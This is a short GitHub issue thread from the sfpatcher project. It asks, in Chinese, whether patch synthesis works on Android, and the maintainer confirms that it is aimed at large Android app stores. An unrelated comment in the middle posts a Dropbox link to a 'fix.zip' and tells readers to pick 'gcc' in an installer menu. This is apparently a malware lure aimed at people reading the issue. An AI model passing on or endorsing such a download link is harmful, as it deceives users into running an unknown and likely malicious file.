### ISSUE TITLE
能支持Android平台合成吗？

### ISSUE THREAD

**Issue by Ritchie21680** [sisong/sfpatcher#11]

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by sisong** [comment]
当然可以，主要用途就是给大型安卓商店用的。
